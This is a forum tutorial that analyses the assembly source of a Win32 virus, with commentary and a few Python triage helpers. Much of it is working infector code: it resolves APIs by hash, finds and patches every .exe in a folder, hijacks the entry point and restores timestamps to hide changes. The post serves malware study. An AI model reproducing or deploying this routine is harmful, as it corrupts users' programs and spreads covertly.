Understanding a Win32 Virus: Code Analysis


Continuing the discussion from Understanding a Win32 Virus: Background Material:

Code Analysis

Let’s begin with the first section of the code.

[BITS 32]    ; defines 32-bit
%include "win32n.inc"
        call CodeStart
        pop ebp
        sub ebp,CodeStart

win32n.inc simply defines a long list of structs which will be used later. The call, pop and sub sequence is a technique known as the delta offset. The call targets the CodeStart label that sits immediately after it, so the return address it pushes is the runtime address of CodeStart. Popping that address into ebp and subtracting the address CodeStart was assembled at leaves ebp holding the difference between where the code was assembled to run and where it is actually running. This is especially important because the code ends up at a different address in every host, so addresses fixed at assembly time would be wrong. Adding ebp to a variable's assembled address gives a relative base offset that allows variables to be accessed without breaking anything.
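The arithmetic behind the delta offset can be sketched in a few lines of Python. This is only an illustration of the subtraction described above; the function names and the example addresses are made up for the sketch and do not come from the virus source.

```python
MASK32 = 0xFFFFFFFF  # registers are 32 bits wide, so arithmetic wraps


def delta_offset(return_address, assembled_label_address):
    """Difference between where CodeStart runs and where it was assembled."""
    return (return_address - assembled_label_address) & MASK32


def runtime_address(delta, assembled_address):
    """Equivalent of [ebp + variable]: assembled address plus the delta."""
    return (delta + assembled_address) & MASK32


# Hypothetical numbers: CodeStart assembled at 0x00401005 but running at 0x0040A205.
delta = delta_offset(0x0040A205, 0x00401005)
variable = runtime_address(delta, 0x00401100)
```

If the code runs exactly where it was assembled, the delta is 0 and every `[ebp+variable]` reference resolves to the assembled address unchanged.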

;    Retrieve Kernel base                             ;
    mov ebx, [fs : 0x30]   ; get a pointer to the PEB
    mov ebx, [ebx + 0x0C]   ; get PEB->Ldr
    mov ebx, [ebx + 0x14]   ; get PEB->Ldr.InMemoryOrderModuleList.Flink (1st entry)
    mov ebx, [ebx]   ; 2nd Entry
    mov ebx, [ebx]   ; 3rd Entry
    mov ebx, [ebx + 0x10]   ; Get Kernel32 Base
    mov [ebp+dwKernelBase] , ebx

This is pretty self-explanatory from the details in the background information section. If we look at the last line, we can see the variable dwKernelBase being used through the offset of ebp. Why ebp? If you’ve forgotten already, look above this code extract. Please note that I’ve also listed the offsets for the structs, again, in the previous section.

;         Retrieve function addresses                     ;
    sub esp , 68      ;save function addresses on the stack
    mov ebx , esp
    lea edi,[ebp+Kernel_APIs]
    mov ecx,16
    mov edx,[ebp+dwKernelBase]
    push ebp
    mov ebp , ebx
    call RetrieveAPIs

Here, esp is lowered to reserve space for the function addresses as local variables. The RetrieveAPIs function is documented as taking the DLL base in edx, a pointer to the list of CRCs of the required functions in edi, the number of functions needed in ecx and a pointer to where the function addresses will be stored in ebp. Since we have 16 kernel32 functions, we require at least 16 * 4 = 64 bytes to store all the addresses. The code reserves 68 bytes, and the extra 4 bytes are used later to hold the address of MessageBox at [ebx+64]. Because ebp is needed as a parameter, the delta offset it holds is pushed onto the stack first. Let’s take a quick look at the RetrieveAPIs function before resuming this section of code.
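As a side note before moving on, the layout of that 68-byte table can be reconstructed from the `call [ebx+N]` comments in the listings further down. The sketch below is my reading of those comments, not something taken from the virus source: the names are written without an A/W suffix because the listings do not give one, and CloseHandle and SetFileTime are inferred from the "Close ... Handle" and "Restore original file time" comments.

```python
# Slot order inferred from the call [ebx+N] comments in the listings.
KERNEL32_SLOTS = [
    "CloseHandle", "CreateFile", "CreateFileMapping", "ExitProcess",
    "FindFirstFile", "FindNextFile", "FlushViewOfFile", "GetFileAttributes",
    "GetFileTime", "LoadLibrary", "MapViewOfFile", "SetEndOfFile",
    "SetFileAttributes", "SetFilePointer", "SetFileTime", "UnmapViewOfFile",
]
USER32_SLOTS = ["MessageBox"]  # stored last, at [ebx+64]


def slot_offsets():
    """Map each function name to its byte offset from ebx (4 bytes per slot)."""
    names = KERNEL32_SLOTS + USER32_SLOTS
    return {name: index * 4 for index, name in enumerate(names)}


offsets = slot_offsets()
table_size = len(offsets) * 4  # total bytes reserved by sub esp, 68
```

Looking up `offsets["LoadLibrary"]` gives 36, which matches the `call [ebx+36]` in the next listing.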

;                                    RetrieveAPIs                               ;
;  Parameters :  DLL base in edx , CRCs Offset in edi , No.of APIs in ecx , Offset to store at in ebp   ;
    push ebx
    push esi
    mov esi, edx
    add esi, [esi+0x3C] ; Start of PE header
    mov esi, [esi+0x78] ; RVA of export dir
    add esi, edx     ; VA of export dir
    push esi      ; [esp] = VA of export dir
    mov esi, [esi+0x20] ; RVA of ENT
    add esi, edx     ; VA of ENT
    xor ebx,ebx
        inc ebx
        add eax , edx       ;eax now points to the string of a function
        call GenerateCRC       ;eax now holds the hash of our function
        cmp dword [edi] , eax
        jne looper
        mov eax,[esp]
        mov eax,[eax+0x24]     ;RVA of EOT
        add eax,edx      ;VA of EOT
        movzx eax , word [(ebx-1)*2+eax]   ;eax now holds the ordinal of our function
        push esi
        mov esi,[esp+4]
        mov esi,[esi+0x1C]     ;RVA of EAT
        add esi,edx      ;VA of EAT
        mov esi,[eax*4+esi]    ; use the ordinal * 4 to get the offset to the function address
        add esi,edx
        mov [ebp] , esi     ;save address
        pop esi
        add edi,4
        add ebp,4
        dec ecx
        jnz looper
    pop esi
    pop esi
    pop ebx

I’ve covered the necessary material at the end of the previous section. Essentially, this piece of code iterates through kernel32's export name table, hashes each name with CRC and compares the result with the precomputed CRC of the next required function. The required functions are listed in alphabetical order, the same order as the export names, so a single pass over the table is enough to find all of them. If the two “hashes” match, the code obtains the function’s address by first looking up its ordinal and then using it as an index into the export address table. The address is stored on the stack and ebp is incremented by 4 to point to the slot for the next function’s address. I won’t worry too much about the specifics of the instructions used but if you wish to know, please leave a comment below and I will explain it. Let’s continue the previous section of code.
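To make the lookup order concrete, here is a small Python model of it that runs over toy tables rather than a real DLL. It is a sketch under assumptions: the virus's GenerateCRC routine is not shown in this article, so `zlib.crc32` stands in for it, and the names, ordinals and addresses are invented for the example.

```python
import zlib


def name_hash(name):
    """Stand-in for GenerateCRC (assumption: the real routine may differ)."""
    return zlib.crc32(name.encode("ascii"))


def resolve_by_hash(names, ordinals, addresses, wanted_hashes):
    """Single pass over the sorted name table, resolving hashes in order."""
    resolved = []
    remaining = list(wanted_hashes)
    for index, name in enumerate(names):
        if not remaining:
            break  # every requested function has been found
        if name_hash(name) == remaining[0]:
            ordinal = ordinals[index]            # name index -> ordinal
            resolved.append(addresses[ordinal])  # ordinal -> address
            remaining.pop(0)
    return resolved


# Toy export tables: the names are sorted, the ordinals are not.
names = ["Alpha", "Bravo", "Charlie", "Delta"]
ordinals = [2, 0, 3, 1]
addresses = [0x1000, 0x2000, 0x3000, 0x4000]
wanted = [name_hash("Bravo"), name_hash("Delta")]
found = resolve_by_hash(names, ordinals, addresses, wanted)
```

The wanted list has to be in the same sorted order as the name table. If it is not, the single pass walks past a name before its hash comes up and that function is never resolved.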

    pop ebp
    lea edx,[ebp+szUser32]    ; "user32.dll"
    push edx
    call [ebx+36]    ; LoadLibrary
    mov edx,eax
    lea edi,[ebp+User_APIs]
    xor ecx,ecx
    inc ecx
    push ebp
    lea ebp , [ebx+64]   ; save the function address on the stack here
    call RetrieveAPIs    ; get MessageBox function address
    pop ebp

As we’ve seen in the analysis from the previous article, the payload is a MessageBox but the function does not exist in kernel32. Instead, it’s located in the user32 DLL. The virus needs to perform the same procedure as it did with kernel32 but this time, on user32. Since the module is not loaded into the address space by default, the virus must load it dynamically with the LoadLibrary function first. Now that the virus has all of its required tools, let’s finally analyze the viral routine.

;   Infection routine : Infect all files in the current directory          ;
    sub esp,324
    push esp
    lea edx,[ebp+szExe]    ; "*.exe"
    push edx
    call [ebx+16]          ; FindFirstFile
    inc eax
    jz endInfection        ; if (FindFirstFile(...) == INVALID_HANDLE_VALUE)
    dec eax                ; restore return value of FindFirstFile
    mov dword [esp+320] , eax  ;save search handle
    call infectFile
    push esp
    push dword [esp+324]
    call [ebx+20]          ; FindNextFile
    test eax,eax           ; if (FindNextFile(...) != FALSE)
    jnz infectNextFile     ; loop
    add esp,324

To infect a file, the virus must first find one. FindFirstFile is called with the search pattern *.exe and fills in a WIN32_FIND_DATA struct describing the first matching file in the working directory. The 324 bytes reserved on the stack hold that struct plus the search handle, which is saved at [esp+320]. If a file is found, infectFile is called, and FindNextFile repeats the process until there are no more matching files.

;    infectFile routine               ;
    sub esp,48
    push ebp
    lea ebp,[esp+4]  
    mov edx , dword [ebp+52+WIN32_FIND_DATA.nFileSizeLow]
    mov [ebp+0] , edx
    mov [ebp+44] , edx
    add dword [ebp+0] , virSize+1000h    ;fileSize+virSize+extra work space
    lea esi , [ebp+52+WIN32_FIND_DATA.cFileName]
    push esi              ; lpFileName
    call [ebx+28]         ;save original attributes; GetFileAttributes
    mov [ebp+4] , eax
    push dword 0x80       ; dwFileAttributes, FILE_ATTRIBUTE_NORMAL
    push esi              ; lpFileName
    call [ebx+48]         ;set to normal , ie clear all attributes: SetFileAttributes

Before attaching its own code to the file, the virus first saves the original file attributes using GetFileAttributes and then sets the file’s attributes to FILE_ATTRIBUTE_NORMAL. I’m assuming that the author decided to do this to make sure the file could be written to in case it was read-only.

    xor edi,edi
    push edi                   ; hTemplateFile, NULL
    push edi                   ; dwFlagsAndAttributes, 0
    push 3                     ; dwCreationDisposition, OPEN_EXISTING
    push edi                   ; lpSecurityAttributes, NULL
    push edi                   ; dwShareMode, 0
    push 0xC0000000            ; dwDesiredAccess, GENERIC_READ | GENERIC_WRITE
    push esi                   ; lpFileName, file to be infected
    call [ebx+4]               ; CreateFile
    inc eax
    jz done                    ; if (CreateFile(...) == INVALID_HANDLE_VALUE)
    dec eax                    ; restore return value
    mov dword [ebp+8] , eax    ; save file handle on local stack

To infect the file, a handle to it must be obtained. CreateFile is called with the GENERIC_READ | GENERIC_WRITE access rights and OPEN_EXISTING, so that only an existing file is opened.

    lea edx , [ebp+12]    ; 
    push edx              ; lpLastWriteTime
    add edx,8
    push edx              ; lpLastAccessTime
    add edx,8
    push edx              ; lpCreationTime
    push eax              ; hFile
    call [ebx+32]         ; GetFileTime

I’m assuming that the code here calls GetFileTime to save the file’s pre-infection timestamps so that they can be restored after its contents are modified, in an attempt to avoid leaving forensic evidence.

    push edi               ; lpName, NULL
    push dword [ebp+0]     ; dwMaximumSizeLow
    push edi               ; dwMaximumSizeHigh, 0
    push 4                 ; flProtect, PAGE_READWRITE
    push edi               ; lpAttributes, NULL
    push dword [ebp+8]     ; hFile
    call [ebx+8]           ; CreateFileMapping
    mov [ebp+36] , eax     ; save handle to mapping on local stack
    push dword [ebp]       ; dwNumberOfBytesToMap, dwMaximumSizeLow
    push edi               ; dwFileOffsetLow, 0
    push edi               ; dwFileOffsetHigh, 0
    push 2                 ; dwDesiredAccess, FILE_MAP_WRITE
    push dword [ebp+36]    ; hFileMappingObject
    call [ebx+40]          ; MapViewOfFile
    mov esi,eax
    mov edi,eax
    mov [ebp+40] , eax     ; save pointer to mapped file

Writing to an executable file is a bit more complex than simply appending to it. When the Windows loader sets up the executable in memory, it relies on the data within the structures of the PE format to know what kind of data each part is and how much of it to load. The virus therefore has to edit those structures, and to do so the host file is mapped into the process’s address space with read and write access using CreateFileMapping and MapViewOfFile. If you’re having trouble understanding this, just imagine that the host file has been read and then loaded into a buffer.

    cmp word [esi] , 'MZ'       ; 'MZ' e_magic
    jne UnMap
    cmp byte [esi+50h] , 't'    ;already infected ?
    je UnMap
    mov byte [esi+50h] , 't'    ;marked
    add esi , [esi+0x3C]        ; move offset of esi to point to PE header
    cmp word [esi] , 'PE'       ; 'PE' signature
    jne UnMap

The next thing to do now is to check if the file is a proper PE file by checking the MZ magic and the PE signature. Here, the author has decided to tag an infected file using the letter t at offset 0x50 from the beginning of the file. If the file is already infected or is not detected as a PE file, it will skip the infection process for optimization.
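From an analyst's point of view, the same three checks can be turned into a quick triage helper. The Python sketch below is my own and not part of the virus: the function name and return strings are made up, it checks the full four-byte PE signature where the listing only compares the first two bytes, and a 't' at offset 0x50 is only a hint since nothing stops a clean file from having that byte there.

```python
import struct

MARKER_OFFSET = 0x50  # offset the listing tags with 't'


def classify_image(image):
    """Classify a file's bytes using the checks from the listing."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        return "not-mz"
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return "not-pe"
    if image[MARKER_OFFSET:MARKER_OFFSET + 1] == b"t":
        return "marked"
    return "unmarked"


# Minimal synthetic image: MZ header pointing at a PE signature at 0x80.
sample = bytearray(0x100)
sample[0:2] = b"MZ"
struct.pack_into("<I", sample, 0x3C, 0x80)
sample[0x80:0x84] = b"PE\0\0"
before = classify_image(bytes(sample))
sample[MARKER_OFFSET] = ord("t")
after = classify_image(bytes(sample))
```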

    mov ecx , esi      ;ecx points to start of pe header
    movzx edx , word [esi+6]    ;no. of sections
    dec edx                     ; sections start with index 0
    imul edx , 0x28             ; size of IMAGE_SECTION_HEADER
    add esi , 0xF8              ; distance from PE header to first section header
    add esi , edx      ;esi points to header of the last section
    add edi , [esi+14h]         ; edi = map base + PointerToRawData
    add edi , [esi+8]     ;start copying virus at offset : map + pointerToRawData + virtualSize
    or dword [esi+0x24] , 00000020h | 20000000h | 80000000h | 80h  ;set flags (writable , executable , etc)

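For the viral code to run, the section it resides in must be executable. We can see that the virus does indeed just append to the end of the last section (as we assumed in the analysis demonstration). The last section header is found by skipping 0xF8 bytes from the PE header to the first section header and then (NumberOfSections - 1) * 0x28 bytes further. Once there, the code ORs the Characteristics member with 0x20 (IMAGE_SCN_CNT_CODE), 0x80 (IMAGE_SCN_CNT_UNINITIALIZED_DATA), 0x20000000 (IMAGE_SCN_MEM_EXECUTE) and 0x80000000 (IMAGE_SCN_MEM_WRITE), making the section both executable and writable.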
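The offset calculation and the flag values are easy to check by hand, and a short Python sketch makes them easier to reuse when inspecting a sample. The helper names are mine. The constants are the standard PE values, and the 0xF8 step assumes a 32-bit PE with the usual optional header size, as the listing does.

```python
SECTION_FLAGS = {
    0x00000020: "IMAGE_SCN_CNT_CODE",
    0x00000080: "IMAGE_SCN_CNT_UNINITIALIZED_DATA",
    0x20000000: "IMAGE_SCN_MEM_EXECUTE",
    0x80000000: "IMAGE_SCN_MEM_WRITE",
}

NT_HEADERS_SIZE = 0xF8      # PE signature + file header + 32-bit optional header
SECTION_HEADER_SIZE = 0x28  # size of IMAGE_SECTION_HEADER


def last_section_header_offset(pe_offset, number_of_sections):
    """File offset of the last section header, as the listing computes it."""
    return pe_offset + NT_HEADERS_SIZE + (number_of_sections - 1) * SECTION_HEADER_SIZE


def describe_flags(characteristics):
    """Names of the flags from the listing that are set in a Characteristics value."""
    return [name for bit, name in SECTION_FLAGS.items() if characteristics & bit]


mask_from_listing = 0x00000020 | 0x20000000 | 0x80000000 | 0x80
flag_names = describe_flags(mask_from_listing)
```

A last section that is both writable and executable is unusual for compiler output, so it can be a useful thing to look for when triaging a file.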

    add dword [esi+8] , virSize ;increase virtual size
    mov edx , dword [esi+8]     ; edx = VirtualSize
    mov dword [ecx+50h] , edx   ; SizeOfImage = VirtualSize (field at PE header + 0x50)
    mov edx , [esi+0xC]         ; edx = VirtualAddress
    add dword [ecx+50h] , edx   ; SizeOfImage = VirtualSize + VirtualAddress (RVA end of section data)
    mov eax , dword [ecx+50h]   ; eax = RVA end of section data
    xor edx , edx
    div dword [ecx+38h]         ; eax /= SectionAlignment, edx = eax % SectionAlignment (remainder)
    mov eax , [ecx+38h]         ; eax = SectionAlignment
    sub eax , edx               ; SectionAlignment -= remainder
    add dword [ecx+50h] , eax   ;new aligned SizeOfImage
    xor edx,edx
    mov eax , dword [esi+8]     ; eax = VirtualSize
    div dword [ecx+3Ch]         ; eax /= FileAlignment, edx = eax % FileAlignment (remainder)
    mov eax , dword [ecx+3Ch]   ; eax = FileAlignment
    sub eax , edx               ; eax -= remainder
    push ecx                    ; preserve ecx
    mov ecx, dword [esi+8]      ; ecx = VirtualSize
    mov dword [esi+10h] , ecx   ; SizeOfRawData = VirtualSize
    add dword [esi+10h] , eax   ; SizeOfRawData = VirtualSize + padding up to FileAlignment
    mov ecx , dword [esi+10h]   ; ecx = new SizeOfRawData
    mov dword [ebp+44] , ecx    ;save new file size for later call to SetFilePointer
    mov ecx , dword [esi+14h]   ; ecx = PointerToRawData
    add dword [ebp+44] , ecx    ; file size = SizeOfRawData + PointerToRawData
    pop ecx                     ; restore ecx

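Before adding the malicious code to the file, the program fixes up the headers to account for its own size. It adds virSize to the last section’s VirtualSize, recomputes SizeOfImage as VirtualAddress + VirtualSize padded up to a multiple of SectionAlignment, and sets SizeOfRawData to VirtualSize padded up to a multiple of FileAlignment. The alignment values themselves are not changed. The author has chosen to save the new size of the file (PointerToRawData plus the new SizeOfRawData) at [ebp+44] for use later on.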
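The padding arithmetic is worth working through once with numbers. The Python sketch below mirrors what the div/sub/add sequence in the listing does. The function names and the header values in the example are invented for illustration, and `align_up` is included only to contrast with the conventional way of rounding.

```python
def pad_like_listing(value, alignment):
    """value + (alignment - value % alignment), as in the listing.

    Note that an already aligned value still gains one full alignment unit.
    """
    return value + (alignment - value % alignment)


def align_up(value, alignment):
    """Conventional round-up, shown for comparison."""
    return (value + alignment - 1) // alignment * alignment


# Hypothetical last-section values after virSize has been added to VirtualSize.
virtual_address = 0x3000
virtual_size = 0x1234
pointer_to_raw_data = 0x800
section_alignment = 0x1000
file_alignment = 0x200

size_of_image = pad_like_listing(virtual_address + virtual_size, section_alignment)
size_of_raw_data = pad_like_listing(virtual_size, file_alignment)
new_file_size = pointer_to_raw_data + size_of_raw_data
```

With these numbers SizeOfImage becomes 0x5000, SizeOfRawData becomes 0x1400 and the new file size is 0x1C00. The two functions only disagree when the input is already a multiple of the alignment.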

    mov eax , dword [esi+0xC]   ; eax = VirtualAddress
    add eax , dword [esi+8]     ; eax += VirtualSize
    mov edx , dword [ecx+28h]   ;save OEP
    add edx , dword [ecx+34h]   ;Add Image base to OEP
    sub eax , virSize           ; eax -= virSize (start of virus code)
    mov dword [ecx+28h] , eax   ;set new entry point
    mov esi , virStart          ; esi = base of code
    add esi , dword [esp]       ; esi += offset to beginning of code
    mov ecx , virSize           ; number of bytes to copy
    cld                         ; set forward direction for rep
    rep movsb         ;copy virus
    sub edi , virSize-(backToHost-virStart)-1    ; OEP placeholder address
    mov dword [edi] , edx      ;patch OEP

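In the first half of the code here, the OEP (Original Entry Point) is saved as an absolute address (AddressOfEntryPoint plus ImageBase) so that once the virus has finished execution, the infected program can continue its regular routine. The entry point in the header is then set to VirtualAddress + VirtualSize - virSize, which is where the virus begins in the last section. To copy the virus code into the target file using rep movsb, esi is given the runtime address of the beginning of the virus (virStart plus the delta offset saved on the stack), edi is given the location the data will be copied to and ecx is given the size of the data to copy. Once the virus code has been copied, edi is moved back to the operand of the push instruction at backToHost in the copy, and the placeholder there is overwritten with the actual OEP.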
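One consequence of this is that an infected file's entry point lands inside its last section, which is something an analyst can test for. The Python sketch below reproduces the entry point arithmetic and the range check. The function names and numbers are my own, and an entry point in the last section is only a heuristic, since packers and some legitimate programs produce the same layout.

```python
def entry_rva_after_append(section_rva, virtual_size_after, appended_size):
    """VirtualAddress + VirtualSize - virSize, as computed in the listing."""
    return section_rva + virtual_size_after - appended_size


def entry_point_in_section(entry_rva, section_rva, virtual_size):
    """True if the entry point RVA falls inside the given section."""
    return section_rva <= entry_rva < section_rva + virtual_size


# Hypothetical values: last section at RVA 0x3000, grown to 0x1234 bytes
# by an appended body of 0x234 bytes.
entry = entry_rva_after_append(0x3000, 0x1234, 0x234)
suspicious = entry_point_in_section(entry, 0x3000, 0x1234)
```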

    push dword [ebp+44]
    push dword [ebp+40]
    call [ebx+24]        ;FlushViewOfFile
    push dword [ebp+40]
    call [ebx+60]        ;UnMapViewOfFile
    push dword [ebp+36]
    call [ebx]        ;Close Map Handle
    lea edx , [ebp+12]
    push edx
    add edx,8
    push edx
    add edx,8
    push edx
    push dword [ebp+8]
    call [ebx+56]        ;Restore original file time
    push 0
    push 0
    push dword [ebp+44]
    push dword [ebp+8]
    call [ebx+52]        ;SetFilePointer
    push dword [ebp+8]
    call [ebx+44]        ;SetEndOfFile
    push dword [ebp+8]
    call [ebx]        ;Close File Handle
    push dword [ebp+4]
    lea edx , [ebp+52+WIN32_FIND_DATA.cFileName]
    push edx
    call [ebx+48]        ;Restore original attributes
    pop ebp
    add esp,48

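I won’t go through this section of the code line by line since it’s mostly cleanup. It flushes and unmaps the view, closes the mapping handle, restores the original file times, moves the file pointer to the new file size saved at [ebp+44] and calls SetEndOfFile to trim off the extra work space, closes the file handle, restores the original attributes and then returns.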

;             Main Payload            ;
    push 0x10                              ; uType; MB_ICONERROR
    lea edx,[ebp+szTitle]
    push edx                               ; lpCaption
    lea edx,[ebp+szMsg] 
    push edx                               ; lpText
    push 0                                 ; hWnd
    call [ebx+64]                          ; MessageBox
    cmp dword [ebp+backToHost+1] , 'SiGs'  ;first generation ?
    jne returnToHost
    push 0                                 ; uExitCode; 0
    call [ebx+12]                          ; ExitProcess

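This is the payload of the virus, i.e. the message box. Afterwards, it compares the dword that follows the push opcode at backToHost with the placeholder 'SiGs'. If the placeholder is still there, the OEP was never patched in, meaning this is the first generation and there is no host to return to, so it calls ExitProcess. Otherwise it jumps to returnToHost.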

;            Return to host           ;
    add esp , 68    
    popad           ; restore register values from before start of virus
    push 'SiGs'     ; push OEP
    retn            ; return to OEP

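This code hands control back to the host. add esp, 68 releases the table of function addresses, popad restores the register values from before the start of the virus, and the push/retn pair jumps to the OEP, since in an infected file the 'SiGs' placeholder has been overwritten with the real address.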
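Because the original entry point sits in the operand of that push, it can be read straight back out of an infected sample. The Python sketch below decodes a `push imm32` / `retn` pair from raw bytes. The helper names and the example stub are assumptions of mine, and it relies on the standard encodings 0x68 for `push imm32` and 0xC3 for `retn`.

```python
import struct

# NASM stores the characters of 'SiGs' in memory in the order written.
PLACEHOLDER = struct.unpack("<I", b"SiGs")[0]


def decode_push_ret(stub):
    """Return the imm32 of a push imm32 / retn pair, or None if it does not match."""
    if len(stub) < 6 or stub[0] != 0x68 or stub[5] != 0xC3:
        return None
    return struct.unpack_from("<I", stub, 1)[0]


def is_first_generation(stub):
    """True if the operand is still the unpatched 'SiGs' placeholder."""
    return decode_push_ret(stub) == PLACEHOLDER


def original_entry_rva(patched_value, image_base):
    """The stub stores OEP + ImageBase, so subtract ImageBase to get the RVA."""
    return (patched_value - image_base) & 0xFFFFFFFF


# Hypothetical patched stub: push 0x00401000 / retn
stub = bytes([0x68]) + struct.pack("<I", 0x00401000) + bytes([0xC3])
oep_va = decode_push_ret(stub)
oep_rva = original_entry_rva(oep_va, 0x00400000)
```

Writing the recovered RVA back into AddressOfEntryPoint is the first step in repairing an infected file by hand.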


This concludes the code analysis of the Win32 Virus. If there’s anything that I’ve missed, please notify me and I will try to correct it ASAP. Otherwise, thanks for reading and I hope you’ve learned something valuable.

– dtm


(123loaded) #2

I can’t get enough of these man!! Keep em coming pleaseeeee!!!
Moooooaaaarrrr!!! <3



Relax m8te.
